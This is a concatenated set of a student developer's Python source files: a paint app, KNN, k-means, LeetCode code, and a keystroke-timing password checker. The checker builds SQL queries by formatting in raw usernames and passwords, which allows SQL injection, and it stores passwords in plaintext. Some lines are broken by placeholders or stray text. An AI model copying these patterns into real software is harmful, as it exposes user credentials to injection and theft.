path = filedialog.askopenfilename(filetypes=[("PNG Files","*.png")])
if path:
img = ImageTk.PhotoImage(Image.open(path))
canvas.create_image(20, 20, anchor=NW, image=img)
# Help
def about():
top = Toplevel(root)
top.geometry("600x300")
top.iconbitmap("about.ico")
Label(top,text="Paint App: About",font=('Calibri',18)).pack(anchor=CENTER)
Label(top,text="This app has been created by Jenil in the udemy course by '<NAME>'.\nI have made this app using Python and Tkinter.",font=("Calbiri",12)).pack()
global img
img = ImageTk.PhotoImage(Image.open("python.png"))
Label(top,image=img).pack()
canvas.pack()
# Key Board Shortcuts
def help_keyboard_shortcuts():
top = Toplevel(root)
top.geometry("400x400")
top.iconbitmap("keyboard.ico")
Label(top,text="Paint App: Key Board Shortcuts",font=('Calibri',18)).pack(anchor=CENTER)
Label(top,text="e: Erase\nh: Change Color\nc: Clear Canvas\nShift + R: Chnage Brush Type To Round\nShift + S: Chnage Brush Type To Slash\nShift + D: Chnage Brush Type To Diamond\nCtrl + N: New File\nCtrl + O Open File\nCtrl + S: Save File",font=("Calbiri",14)).pack()
# Eraser
def eraser(blah=None):
global brush_color
brush_color = "white"
# Create Menu Bar
menu = Menu(root)
root.config(menu=menu)
# Create a file menu item
file_menu = Menu(menu)
file_menu.add_command(label="New File",command=new_file)
file_menu.add_command(label="Open File",command=open_file)
file_menu.add_command(label="Save",command=save_to_png)
file_menu.add_separator()
file_menu.add_command(label="Exit",command=root.quit)
menu.add_cascade(label="File",menu=file_menu)
# Create a help menu item
help_menu = Menu(menu)
help_menu.add_command(label="About",command=about)
help_menu.add_command(label="Key Board Shrtcuts",command=help_keyboard_shortcuts)
menu.add_cascade(label="Help",menu=help_menu)
# Width and Height
w = 600
h = 400
# Create Canvas
canvas = Canvas(root,width=w,height=h,bg="white")
canvas.bind("<B1-Motion>",draw)
canvas.pack(pady=20)
# Create Brush Options Frames
brush_options_frame = Frame(root)
brush_options_frame.pack(pady=10)
# Brush Size : Brush Options
brush_size_frame = LabelFrame(brush_options_frame,text="Brush Size")
brush_size_frame.grid(row=0,column=0,padx=30)
# Brush Slider
brush_slider = ttk.Scale(brush_size_frame,from_ = 100,to = 1,orient=VERTICAL,value=20,command=change_brush_size)
brush_slider.pack(pady=10,padx=10)
# Brush Slider Labelk
brush_slider_label = Label(brush_size_frame,text=brush_slider.get())
brush_slider_label.pack()
# Brush Type : Brush Options
brush_type_frame = LabelFrame(brush_options_frame,text="Brush Type")
brush_type_frame.grid(row=0,column=1,padx=30)
# Create Tkinter String Variable to store Brush Type
brush_style_type = StringVar()
brush_style_type.set(ROUND)
# Create Radio Buttons
brush_type_radio_btn_1 = Radiobutton(brush_type_frame,text="Round",variable=brush_style_type,value=ROUND)
brush_type_radio_btn_1.pack(anchor=W)
brush_type_radio_btn_2 = Radiobutton(brush_type_frame,text="Slash",variable=brush_style_type,value=BUTT)
brush_type_radio_btn_2.pack(anchor=W)
brush_type_radio_btn_3 = Radiobutton(brush_type_frame,text="Diamond",variable=brush_style_type,value=PROJECTING)
brush_type_radio_btn_3.pack(anchor=W)
# Change Colors
change_color_frame = LabelFrame(brush_options_frame,text="Change Colors")
change_color_frame.grid(row=0,column=2,padx=30)
# Change Brush Color Button
change_brush_color_btn = Button(change_color_frame,text="Brush Color",command=change_brush_color)
change_brush_color_btn.pack(pady=10,padx=10)
# Change Canvas Color Button
change_canvas_color = Button(change_color_frame,text="Canvas Color",command=change_canvas_color)
change_canvas_color.pack(pady=10,padx=10)
# Program Options Frame
options_frame = LabelFrame(brush_options_frame,text="Options")
options_frame.grid(row=0,column=3,padx=30)
# Clear Button
clear_btn = Button(options_frame,text="Clear Canvas",command=clear_canvas)
clear_btn.pack(padx=10,pady=10)
# Save Button
save_to_png_btn = Button(options_frame,text="Save to PNG",command=save_to_png)
save_to_png_btn.pack(padx=10,pady=10)
# Eraser
eraser_btn = Button(options_frame,text="Eraser Tool",command=eraser)
eraser_btn.pack(padx=10,pady=10)
# Change Colors
pen_colors_frame = LabelFrame(brush_options_frame,text="Pen Colors")
pen_colors_frame.grid(row=0,column=4,padx=30)
# Black
black_color_btn = Button(pen_colors_frame,bg="black",command=lambda: change_color("black"))
black_color_btn.grid(row=0,column=0,padx=5,pady=5)
# White
white_color_btn = Button(pen_colors_frame,bg="white",command=lambda: change_color("white"))
white_color_btn.grid(row=1,column=0,padx=5,pady=5)
# Red
red_color_btn = Button(pen_colors_frame,bg="red",command=lambda: change_color("red"))
red_color_btn.grid(row=0,column=1,padx=5,pady=5)
# Pink
pink_color_btn = Button(pen_colors_frame,bg="Pink",command=lambda: change_color("Pink"))
pink_color_btn.grid(row=1,column=1,padx=5,pady=5)
# Blue
blue_color_btn = Button(pen_colors_frame,bg="blue",command=lambda: change_color("blue"))
blue_color_btn.grid(row=0,column=2,padx=5,pady=5)
# Light Blue
light_blue_color_btn = Button(pen_colors_frame,bg="light blue",command=lambda: change_color("light blue"))
light_blue_color_btn.grid(row=1,column=2,padx=5,pady=5)
# Orange
orange_color_btn = Button(pen_colors_frame,bg="orange",command=lambda: change_color("orange"))
orange_color_btn.grid(row=0,column=5,padx=5,pady=5)
# Yellow
yellow_color_btn = Button(pen_colors_frame,bg="yellow",command=lambda: change_color("yellow"))
yellow_color_btn.grid(row=1,column=5,padx=5,pady=5)
# Green
green_color_btn = Button(pen_colors_frame,bg="green",command=lambda: change_color("green"))
green_color_btn.grid(row=0,column=4,padx=5,pady=5)
# Light green
light_green_color_btn = Button(pen_colors_frame,bg="light green",command=lambda: change_color("light green"))
light_green_color_btn.grid(row=1,column=4,padx=5,pady=5)
# Key Board Shortucts
root.bind("<e>",eraser)
root.bind("<h>",change_brush_color)
root.bind("<c>",clear_canvas)
root.bind("<Shift_L><R>",lambda e: brush_style_type.set(ROUND))
root.bind("<Shift_L><S>",lambda e: brush_style_type.set(BUTT))
root.bind("<Shift_L><D>",lambda e: brush_style_type.set(PROJECTING))
root.bind("<Control_L><s>",lambda e: save_to_png())
root.bind("<Control_L><n>",lambda e: new_file())
root.bind("<Control_L><o>",lambda e: open_file())
root.bind("<F1>",lambda e: about())
root.bind("<F2>",lambda e: help_keyboard_shortcuts())
root.mainloop()
# -<NAME>
```
|
{
"source": "jenildesai25/ATNT50",
"score": 3
}
|
#### File: ATNT50/ATNT50/Knn.py
```python
import ReadData
from scipy.spatial import distance
from sklearn.neighbors import KNeighborsClassifier
from sklearn.model_selection import KFold
import Task_E
class Knn:
def __init__(self, k):
self.k = k
def load_train_test_data(self, train_data, test_data):
"""
:param train_data: train data(raw data) is file we wanted our algorithm to train with so we can use that result with test data.
:param test_data: test data(raw data) for checking that our prediction is right or not and finding the accuracy.
:return: well formed train and test data with having rows as one image and index is label of the image.
"""
try:
# next line will give you transposed and well formatted train data.
train_data = ReadData.load_data(train_data)
# next line will give you transposed and well formatted test data.
test_data = ReadData.load_test_data(test_data)
return train_data, test_data
except Exception as e:
print(e)
def calculate_distance(self, train_data, test_data):
"""
:param train_data: formatted train data that we get from load_train_test_data function.
:param test_data: formatted test data that we get from load_train_test_data function.
:return: dictionary with having key as test data index i.e in our case ['1','4','5','3','2']. be careful keys are in string.
and values are sorted euclidean distance with label from train data.
container = {'1':[(1111,1),(131241,3),...]}
'1' is the key from test data and (1111) is the distance between 1st instance of train data with 1st data instance from test data.
1 is the label of train data.
"""
result_list = list()
for test_data_instance in test_data:
result_dict = dict()
# print('test_data_instance',test_data_instance)
nearest_neighbors = self.get_nearest_neighbors(train_data, test_data_instance)
# print('nearest_neighbors',nearest_neighbors)
calculated_classification = self.get_classification(nearest_neighbors)
result_dict['Test Label'] = test_data_instance[0]
result_dict['Neighbors Label'] = nearest_neighbors
result_dict['Classification'] = calculated_classification
result_list.append(result_dict) # Given Classification, Calculated Classification
# Calculate Accuracy
return result_list
def get_nearest_neighbors(self, training_data, testing_data):
try:
distances = []
for training_data in training_data:
euclidean_dist = distance.euclidean(training_data[1:], testing_data[1:])
distances.append((euclidean_dist, training_data[0]))
# Sort by distances
sorted_distances = sorted(distances, key=lambda x: x[0])
return [distance_data[1] for distance_data in sorted_distances[:self.k]]
except Exception as e:
print(e)
def get_classification(self, nearest_neighbour):
""" Returns label
"""
class_votes = dict()
for label in nearest_neighbour:
vote = class_votes.get(label, 0)
class_votes[label] = vote + 1
sorted_votes = sorted(
list(class_votes.items()), key=lambda x: x[1], reverse=True)
return sorted_votes[0][0]
def get_accuracy(self, prediction_n_test):
correct = 0
for prediction, test in prediction_n_test:
if prediction == test:
correct += 1
return (float(correct) / float(len(prediction_n_test))) * 100.0
```
#### File: ATNT50/ATNT50/ReadData.py
```python
import pandas as pd
import sys
def load_data(file_name):
# read_csv file and return data frame.
load_file = pd.read_csv(file_name, sep=",", header=None)
load_file = load_file.transpose()
return load_file
def load_test_data(file_name):
load_file = pd.read_csv(file_name, sep=",", header=None)
load_file = load_file.transpose()
return load_file
def data_handler(file_name):
load_file = pd.read_csv(file_name, sep=",", header=None)
load_file = load_file.transpose()
train_data = load_file[:30]
test_data = load_file[30:39]
return train_data, test_data
def load_data(file, algo):
load_file = pd.read_csv(file, sep=',', header=None)
labels = load_file.iloc[0]
# print(labels)
N_instance = labels.size
# print(N_instance)
data = load_file.iloc[1:]
if algo == "LG":
return N_instance, labels, data
elif algo == "SVM":
return labels.transpose(), data.transpose()
# if __name__ == '__main__':
# # if file is in the same directory where path is just put file name.
# # if reading file using terminal uncomment next line and pass file_path
# # file_path = sys.argv[2]
# # load_data('trainDataXY.txt')
# load_data('C:/Users/jenil/OneDrive - University of Texas at Arlington/UTA/sem 3/CSE 5334/Project1/ATNT50/trainDataXY.txt')
```
|
{
"source": "jenildesai25/k_means_implementation",
"score": 3
}
|
#### File: jenildesai25/k_means_implementation/Kmeans.py
```python
import numpy as np
import pandas as pd
from scipy.spatial import distance
def find_cluster(data_frame, data_frame_cluster):
cluster = {}
for i, center in enumerate(data_frame_cluster.values):
cluster[i] = []
for j, point in enumerate(data_frame.values):
euclDist = float('inf')
euclCenter = 0
for i, center in enumerate(data_frame_cluster.values):
dist = distance.euclidean(point, center)
if dist < euclDist:
euclDist = dist
euclCenter = i
# cluster[euclCenter] = []
if cluster[euclCenter]:
cluster[euclCenter].append(point)
else:
cluster[euclCenter] = [point]
# print(cluster)
return cluster
def mykmeans(X, k):
# DONE create k random centroid from dataset.
# TODO count euclidean distance from each centroid.
# TODO we find the new centroid by taking the average of all the points assigned to that cluster.
# TODO we repeat step 2 and 3 until none of the cluster assignments change. That means until our clusters remain stable, we repeat the algorithm
try:
data_frame = pd.DataFrame(data=X)
# data_frame = data_frame
data_frame_cluster = data_frame.sample(n=k)
# print(data_frame_cluster)
prev_centers = []
while True:
# Group data in clusters
cluster = find_cluster(data_frame, data_frame_cluster)
# Calculate new centroid
centers = []
for clusterKey, clusterValue in cluster.items():
df = pd.DataFrame(clusterValue)
center = []
for column in df:
center.append(df[column].mean())
centers.append(center)
# Breaking condition, if prev centers and current centers are same
if prev_centers == centers:
break
data_frame_cluster = pd.DataFrame(centers)
prev_centers = centers
print("For k = " + str(k) + " centers are: ")
print(centers)
except Exception as e:
print(e)
```
|
{
"source": "jenildesai25/LeetCode",
"score": 4
}
|
#### File: LeetCode/MergeTwoSortedLists/MergeTwoSortedLists.py
```python
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __repr__(self):
return '{}->{}'.format(self.val, self.next)
class MergeTwoSortedLists:
def merge_two_sorted_lists(self, list_node_1, list_node_2):
current = temp = ListNode(0)
while list_node_1 and list_node_2:
if list_node_1.val < list_node_2.val:
current.next = list_node_1
list_node_1 = list_node_1.next
else:
current.next = list_node_2
list_node_2 = list_node_2.next
current = current.next
current.next = list_node_1 or list_node_2
return temp.next
if __name__ == "__main__":
merge_two_sorted_lists_obj = MergeTwoSortedLists()
l1 = ListNode(1)
l1.next = ListNode(4)
l2 = ListNode(1)
l2.next = ListNode(4)
print(merge_two_sorted_lists_obj.merge_two_sorted_lists(l1, l2))
```
|
{
"source": "jenildesai25/logging",
"score": 3
}
|
#### File: jenildesai25/logging/closeButton.py
```python
import sys
from PyQt5.QtWidgets import (
QApplication, QWidget, QToolTip, QPushButton, QMessageBox)
from PyQt5.QtCore import QCoreApplication, Qt
class Window(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
btn = QPushButton()
# btn.setToolTip("Close Application")
# btn.clicked.connect(QCoreApplication.instance().quit)
# instead of above button signal, try to call closeEvent method below
btn.clicked.connect(self.closeEvent)
btn.resize(btn.sizeHint())
btn.move(410, 118)
self.setGeometry(30, 450, 500, 150)
self.setWindowTitle("Terminator")
self.show()
def closeEvent(self, event):
"""Generate 'question' dialog on clicking 'X' button in title bar.
Reimplement the closeEvent() event handler to include a 'Question'
dialog with options on how to proceed - Save, Close, Cancel buttons
"""
reply = QMessageBox.question(
self, "Message",
"Are you sure you want to quit? Any unsaved work will be lost.",
QMessageBox.Yes | QMessageBox.No,
QMessageBox.Yes)
# int(reply)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
def keyPressEvent(self, event):
"""Close application from escape key.
results in QMessageBox dialog from closeEvent, good but how/why?
"""
if event.key() == Qt.Key_Escape:
self.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
w = Window()
sys.exit(app.exec_())
```
#### File: jenildesai25/logging/multiprocessings.py
```python
from multiprocessing import Process, Queue
def is_even(numbers, q):
for n in numbers:
if n % 2 == 0:
q.put(n)
if __name__ == "__main__":
q = Queue()
p = Process(target=is_even,args=(range(20),q))
p.start()
p.join()
# print(q)
while q:
print(q.get())
```
|
{
"source": "jenildesai25/password_checker",
"score": 3
}
|
#### File: password_checker/models/models.py
```python
from models.connection import Connection
# User Object
class User(object):
def __init__(self, id, username, fname, lname):
self.id = id
self.username = username
self.fname = fname
self.lname = lname
@classmethod
# Insert into User Table
def insert_into_user(cls, username, fname, lname):
conn = Connection()
query = "INSERT INTO User (FName, LName, Username) VALUES('{fname}', '{lname}', '{username}')".format(fname=fname, lname=lname, username=username)
cur = conn.get_cursor()
cur.execute(query)
conn.connection.commit()
conn.close_connection()
@classmethod
# Fetch from User Table
def fetch_by_username(cls, username):
conn = Connection()
query = "SELECT * FROM User WHERE Username = '{uname}'".format(uname=username)
cur = conn.get_cursor()
cur.execute(query)
user_row_dict = cur.fetchone()
conn.close_connection()
if user_row_dict:
return User(id=user_row_dict['ID'], username=user_row_dict['Username'], fname=user_row_dict['FName'],
lname=user_row_dict['LName'])
class Password(object):
def __init__(self, id, userid):
self.id = id
self.userid = userid
@classmethod
def insert_into_passwords(cls, password, userid):
conn = Connection()
# Update for all passwords of userid iscurrent=False
query = "UPDATE Passwords SET IsCurrent = False WHERE UserID = {userid}".format(userid=userid)
cur = conn.get_cursor()
cur.execute(query)
conn.connection.commit()
query = "INSERT INTO Passwords (IsCurrent, Password, UserID) VALUES({iscurrent}, '{password}', {userid})".format(
iscurrent=True, password=password, userid=userid)
cur.execute(query)
conn.connection.commit()
conn.close_connection()
@classmethod
def fetch_by_userid(cls, userid, password):
conn = Connection()
query = "SELECT * FROM Passwords WHERE Userid = {userid} AND Password = '{password}'".format(
userid=userid, password=password)
cur = conn.get_cursor()
cur.execute(query)
passwords_row_dict = cur.fetchone()
conn.close_connection()
if passwords_row_dict:
return Password(id=passwords_row_dict['ID'], userid=passwords_row_dict['UserID'])
class PasswordAnalytics(object):
def __init__(self, id, aggregate, count, passwordid):
self.id = id
self.aggregate = aggregate
self.count = count
self.passwordid = passwordid
@classmethod
def insert_into_password_analytics(cls, aggregate, count, password_id):
conn = Connection()
query = "INSERT INTO PasswordAnalytics (Aggregate, Count, PasswordID) VALUES ({aggregate}, {count}, " \
"{password_id})".format(aggregate=aggregate, count=count, password_id=password_id)
cur = conn.get_cursor()
cur.execute(query)
conn.connection.commit()
conn.close_connection()
@classmethod
def fetch_by_password_id(cls, password_id):
conn = Connection()
query = "SELECT * FROM PasswordAnalytics WHERE PasswordID = {password_id}".format(password_id=<PASSWORD>)
cur = conn.get_cursor()
cur.execute(query)
passwordanalytics_row_dict = cur.fetchone()
conn.close_connection()
if passwordanalytics_row_dict:
return PasswordAnalytics(id=passwordanalytics_row_dict['ID'],
aggregate=passwordanalytics_row_dict['Aggregate'],
count=passwordanalytics_row_dict['Count'],
passwordid=passwordanalytics_row_dict['PasswordID'])
def update_analytics(self, sample_aggregate, sample_count):
conn = Connection()
# Update for all passwords of userid iscurrent=False
query = "UPDATE PasswordAnalytics SET Aggregate = {0}, Count={1} WHERE PasswordID = {2}".format(
self.aggregate+sample_aggregate, self.count+sample_count, self.passwordid)
cur = conn.get_cursor()
cur.execute(query)
conn.connection.commit()
# Get mean
# Update Total and Count
```
#### File: password_checker/views/views.py
```python
from models.models import User, Password, PasswordAnalytics
from models.algorithm import Statistics, TTests
class Response(object):
def __init__(self, code, message, data=dict()):
self.code = code
self.message = message
self.data = data
def data_dict(self):
return {
'code': self.code,
'message': self.message,
'data': self.data
}
class UserView(object):
@classmethod
def register(cls, username, fname, lname, password, timestamp_array1, timestamp_array2, timestamp_array3):
time_array1 = []
for i in range(len(timestamp_array1) - 1):
time_array1.append(float(timestamp_array1[i + 1] - timestamp_array1[i])/float(1000))
time_array2 = []
for i in range(len(timestamp_array2) - 1):
time_array2.append(float(timestamp_array2[i + 1] - timestamp_array2[i])/float(1000))
time_array3 = []
for i in range(len(timestamp_array3) - 1):
time_array3.append(float(timestamp_array3[i + 1] - timestamp_array3[i])/float(1000))
print(time_array1, time_array2, time_array3)
# Create user
User.insert_into_user(username=username, fname=fname, lname=lname)
# Fetch user
user = User.fetch_by_username(username=username)
# Add new password
Password.insert_into_passwords(userid=user.id, password=password)
# Fetch the password
password = Password.fetch_by_userid(userid=user.id, password=password)
array1_sum = Statistics.sum(time_array1)
array2_sum = Statistics.sum(time_array2)
array3_sum = Statistics.sum(time_array3)
total_sum = array1_sum + array2_sum + array3_sum
total_lens = len(time_array1) + len(time_array2) + len(time_array3)
# Insert password analytics
PasswordAnalytics.insert_into_password_analytics(password_id=password.id, aggregate=total_sum, count=total_lens)
return Response(code=200, message='OK')
@classmethod
def login(cls, username, password, timestamp_array):
time_array = []
for i in range(len(timestamp_array) -1):
time_array.append(float(timestamp_array[i+1] - timestamp_array[i])/float(1000))
print(time_array)
# Fetch user
user = User.fetch_by_username(username=username)
if not user:
return Response(code=400, message='Invalid Username')
# Fetch Password object
password = Password.fetch_by_userid(userid=user.id, password=password)
if not password:
return Response(code=400, message='Invalid Password')
# Fetch Password Analytics
password_analytics = PasswordAnalytics.fetch_by_password_id(password_id=<PASSWORD>)
# Get statistics of user input
sample_stats = Statistics(data_list=time_array)
sample_stats.compute_all()
# Get statistics of existing inputs
population_mean = Statistics.mean(password_analytics.aggregate, password_analytics.count)
# Calculating the t statistic
t_stat = TTests.t_statistic(population_mean=population_mean,
sample_mean=sample_stats.data_list_mean,
sample_std_deviation=sample_stats.data_list_standard_dev,
sample_length=sample_stats.data_list_len_f)
# Calculating the t distribution
t_dist_min, t_dist_max = TTests.t_distribution(sample_length=sample_stats.data_list_len_f, alpha=0.01)
print(t_stat, t_dist_min, t_dist_max)
if t_stat < t_dist_min or t_stat > t_dist_max:
return Response(code=400, message='Intrusion Detected')
else:
password_analytics.update_analytics(sample_stats.data_list_sum, int(sample_stats.data_list_len_f))
return Response(code=200, message='OK')
```
|
{
"source": "jenildesai25/Visa_interview",
"score": 3
}
|
#### File: jenildesai25/Visa_interview/compare_two_values.py
```python
VISA full time master's MCQ.
def func(a, b):
x = a
y = b
while x != y:
if x > y:
x = x - y
if x < y:
y = y - x
return x or y
print(func(2437, 875))
```
|
{
"source": "jenilgandhi2111/Image-Captionizer",
"score": 3
}
|
#### File: jenilgandhi2111/Image-Captionizer/Main.py
```python
import matplotlib.pyplot as plt
import torch
import torchvision.transforms as transforms
import torch.optim as optim
import torch.nn as nn
from preprocessing import get_loader
from testing import print_test_examples
from model import ImageCaptionizer
from tqdm import tqdm
def train():
loss_points = []
transform = transforms.Compose(
[
# Resizing to a larger dimension just to enhance features
transforms.Resize((356, 356)),
# Inception V3 Input size is (299,299)
transforms.RandomCrop((299, 299)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
)
# Getting the dataset from getloader
loader, dataset = get_loader(
root_folder="Image-Captionizer\Flickr8K\Images",
annotation_file="Image-Captionizer\Flickr8K\captions.txt",
transform=transform, num_workers=2
)
# HyperParams
device = torch.device("cpu")
embed_size = 256
hidden_size = 256
vocab_size = len(dataset.vocab)
num_layers = 1
lr = 3e-4
num_epochs = 1
model = ImageCaptionizer(embed_size, hidden_size, vocab_size, num_layers)
lossfn = nn.CrossEntropyLoss(ignore_index=dataset.vocab.stoi["<PAD>"])
optimizer = optim.Adam(model.parameters(), lr=lr)
for name, param in model.encoder.inception.named_parameters():
if "fc.weight" in name or "fc.bias" in name:
param.requires_grad = True
else:
param.requires_grad = False
model.train()
for epoch in range(num_epochs):
print("> Epoch:", str(epoch+1))
for idx, (img, capt) in tqdm(enumerate(loader), total=len(loader), leave=False):
plt.plot(loss_points)
print_test_examples(model, device, dataset)
img = img.to(device)
capt = capt.to(device)
outputs = model(img, capt[:-1])
loss = lossfn(
outputs.reshape(-1, outputs.shape[2]), capt.reshape(-1)
)
loss_points.append(loss)
optimizer.zero_grad()
loss.backward(loss)
optimizer.step()
train()
```
#### File: jenilgandhi2111/Image-Captionizer/preprocessing.py
```python
import os
import torch
import spacy
import pandas as pd
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader, Dataset, dataset
from PIL import Image
import torchvision.transforms as transforms
spacy_en = spacy.load("en_core_web_sm")
class TextPreprocessor:
def __init__(self, threshhold=5):
print("> Text Preprocessor initialized")
self.threshhold = threshhold
self.stoi = {"<PAD>": 0, "<SOS>": 1, "<EOS>": 2, "<UNK>": 3}
self.itos = {0: "<PAD>", 1: "<SOS>", 2: "<EOS>", 3: "<UNK>"}
def __len__(self):
return len(self.stoi)
@staticmethod
def tokenizer_eng(text):
return [token.text.lower() for token in spacy_en(text)]
def build_vocab(self, captions):
print("> Building Vocab")
freq = {}
idx = 4
for sent in captions:
for word in self.tokenizer_eng(sent):
if word not in freq:
freq[word] = 1
else:
freq[word] += 1
# Now check if this word has the threshhold
# frequency if yes then add it to stoi and itos dict
if freq[word] == self.threshhold:
self.stoi[word] = idx
self.itos[idx] = word
idx += 1
print("> Finished Building Vocab")
def numericalize(self, text):
tokenized_txt = self.tokenizer_eng(text)
ret_list = []
ret_list.append(self.stoi["<SOS>"])
for token in tokenized_txt:
if token in self.stoi:
ret_list.append(self.stoi[token])
else:
ret_list.append(self.stoi["<UNK>"])
ret_list.append(self.stoi["<EOS>"])
return ret_list
class FlickrDataset(Dataset):
def __init__(self,
image_dir,
caption_file,
transforms=None,
threshhold=5):
print("> Dataset initialized")
self.root_dir = image_dir
self.caption_file = caption_file
self.df = pd.read_csv(caption_file)
self.transform = transforms
# The df would have a image and a caption mapped to it
self.images = self.df["image"]
self.captions = self.df["caption"]
self.vocab = TextPreprocessor(threshhold=threshhold)
self.vocab.build_vocab(self.captions.tolist())
def __len__(self):
return len(self.captions)
def __getitem__(self, index):
print("> Index:", str(index))
caption = self.captions[index]
# This a image path we need to open that image by PIL
image_idx = self.images[index]
image = Image.open(os.path.join(
self.root_dir, image_idx)).convert("RGB")
if self.transform is not None:
image = self.transform(image)
capt = []
capt += self.vocab.numericalize(caption)
return image, torch.tensor(capt)
# tx = TextPreprocessor(1)
# tx.build_vocab(["jenil is going home", "parishi is goint to school"])
# print(tx.numericalize("jenil is fine going"))
class Connector:
def __init__(self, padding_id):
self.pad_id = padding_id
def __call__(self, batch):
imgs = [item[0].unsqueeze(0) for item in batch]
imgs = torch.cat(imgs, dim=0)
targets = [item[1] for item in batch]
targets = pad_sequence(targets, batch_first=False,
padding_value=self.pad_id)
return imgs, targets
def get_loader(
root_folder,
annotation_file,
transform=True,
batch_size=32,
num_workers=8,
shuffle=True,
pin_memory=True,
):
print("> Loader Called")
transform = transforms.Compose([
transforms.Resize((356, 356)),
transforms.RandomCrop((299, 299)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
dataset = FlickrDataset(root_folder, annotation_file, transforms=transform)
pad_idx = dataset.vocab.stoi["<PAD>"]
loader = DataLoader(
dataset=dataset,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=pin_memory,
collate_fn=Connector(padding_id=pad_idx),
)
return loader, dataset
```
|
{
"source": "jenilgandhi2111/Sequence-2-Sequence",
"score": 3
}
|
#### File: jenilgandhi2111/Sequence-2-Sequence/Dataloader.py
```python
import os
import sys
import pandas as pd
import spacy
import torch
from torch.nn.utils.rnn import pad_sequence
from torch.utils import data
from torch.utils.data import DataLoader, Dataset, dataset
spacy_ger = spacy.load("de_core_news_md")
spacy_eng = spacy.load("en_core_web_sm")
class Vocabulary:
def __init__(self,
language,
freq_threshhold):
self.language = language
if language == "de":
self.language_model = spacy_ger
else:
self.language_model = spacy_eng
self.freq_threshhold = freq_threshhold
self.itos = {0: "<PAD>", 1: "<SOS>", 2: "<EOS>", 3: "<UNK>"}
self.stoi = {"<PAD>": 0, "<SOS>": 1, "<EOS>": 2, "<UNK>": 3}
def __len__(self):
return len(self.stoi)
@staticmethod
def tokenizer(sent, tokenizer_fn):
# print([tok.text for tok in tokenizer_fn.tokenizer(sent[0])])
return [tok.text for tok in tokenizer_fn.tokenizer(sent[0])]
def build_vocab(self, sentence_list):
print("> Building vocab for:", self.language)
freq = {}
idx = 4
cntr = 0
for i in sentence_list:
# print(cntr)
cntr += 1
for word in self.tokenizer(i, self.language_model):
if word not in freq:
freq[word] = 1
else:
freq[word] += 1
if freq[word] == 2:
self.stoi[word] = idx
self.itos[idx] = word
idx += 1
# print(idx)
print("> Finised Building vocab for:", self.language)
# print(self.stoi)
def numericalize(self, text):
# print(self.stoi[text.split(" ")[0]])
# print(text.split(" ")[0])
# print(self.stoi[text.split(" ")[1]])
# print(text.split(" ")[1])
# print(text)
# print(self.stoi)
# print(self.itos[24])
# print(self.stoi['ballet'])
# print(self.itos[3755])
ret_lst = []
for word in self.language_model.tokenizer(text):
# print(word)
if str(word) in self.stoi:
ret_lst.append(self.stoi[str(word)])
else:
ret_lst.append(self.stoi["<UNK>"])
# print(ret_lst)
return ret_lst
class MyDataset(Dataset):
def __init__(self, eng_file, ger_file, freq_threshhold=2):
self.eng_file = eng_file
self.ger_file = ger_file
self.english = (pd.read_csv(
eng_file, delimiter="\n")).values.tolist()
self.german = (pd.read_csv(
ger_file, delimiter="\n")).values.tolist()
self.eng_vocab = Vocabulary("en", 2)
self.ger_vocab = Vocabulary("de", 2)
self.eng_vocab.build_vocab(self.english)
self.ger_vocab.build_vocab(self.german)
def __len__(self):
return len(self.english)
def __getitem__(self, index):
# print("index:", index)
eng_sent = self.english[index][0]
# print(eng_sent)
num_eng_sent = [self.eng_vocab.stoi["<SOS>"]]
num_eng_sent += self.eng_vocab.numericalize(eng_sent)
num_eng_sent.append(self.eng_vocab.stoi["<EOS>"])
# print(len(num_eng_sent))
ger_sent = self.german[index][0]
num_ger_sent = [self.ger_vocab.stoi["<SOS>"]]
num_ger_sent += self.ger_vocab.numericalize(ger_sent)
num_ger_sent.append(self.ger_vocab.stoi["<EOS>"])
# print(torch.tensor(num_eng_sent).shape)
return torch.tensor(num_eng_sent), torch.tensor(num_ger_sent)
class MyCollate:
def __init__(self, pad_id_eng, pad_id_ger):
self.pad_id_eng = pad_id_eng
self.pad_id_ger = pad_id_ger
def __call__(self, batch):
srcs = [item[0] for item in batch]
srcs = pad_sequence(srcs, batch_first=False,
padding_value=self.pad_id_ger)
trgs = [item[1] for item in batch]
trgs = pad_sequence(trgs, batch_first=False,
padding_value=self.pad_id_eng)
return srcs, trgs
def get_loader(english_file,
german_file,
batch_size=32,
num_workers=2,
shuffle=False,
pin_memory=True):
dataset = MyDataset(english_file, german_file, 2)
pad_id_eng = dataset.eng_vocab.stoi["<PAD>"]
pad_id_ger = dataset.ger_vocab.stoi["<PAD>"]
loader = DataLoader(dataset=dataset,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=pin_memory,
collate_fn=MyCollate(pad_id_eng=pad_id_eng, pad_id_ger=pad_id_ger))
return loader, dataset
# if __name__ == "__main__":
# loader, dataset = get_loader("english.tsv",
# "german.tsv")
# cntr = 0
# for idx, (a, b) in enumerate(loader):
# if cntr == 0:
# cntr += 1
# print(a.shape)
# print(b.shape)
# print(a)
# print(a.shape)
# md = MyDataset("english.tsv", "german.tsv", 2)
# print(md[9])
```
|
{
"source": "jenish-acharya/puppy_store",
"score": 3
}
|
#### File: puppies/tests/test_views.py
```python
import json
from urllib import response
from rest_framework import status
from django.test import TestCase, Client
from django.urls import reverse
from puppies.models import Puppy
from puppies.serializers import PuppySerializer
# initialize the APIClient app
client = Client()
class GetAllPuppiesTest(TestCase):
"""Test module for GET all puppies API"""
def setUp(self):
Puppy.objects.create(name="Casper", age=3, breed="Bull Dog", color="Black")
Puppy.objects.create(name="Muffin", age=1, breed="Gradane", color="Brown")
Puppy.objects.create(name="Rambo", age=2, breed="Labrador", color="Black")
Puppy.objects.create(name="Ricky", age=6, breed="Labrador", color="Brown")
def test_get_all_puppies(self):
# get API response
response = client.get(reverse("get_post_puppies"))
# get data from db
puppies = Puppy.objects.all()
serializer = PuppySerializer(puppies, many=True)
self.assertEqual(response.data, serializer.data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
class GetSinglePuppyTest(TestCase):
"""Test module for GET single puppy API"""
def setUp(self):
self.casper = Puppy.objects.create(
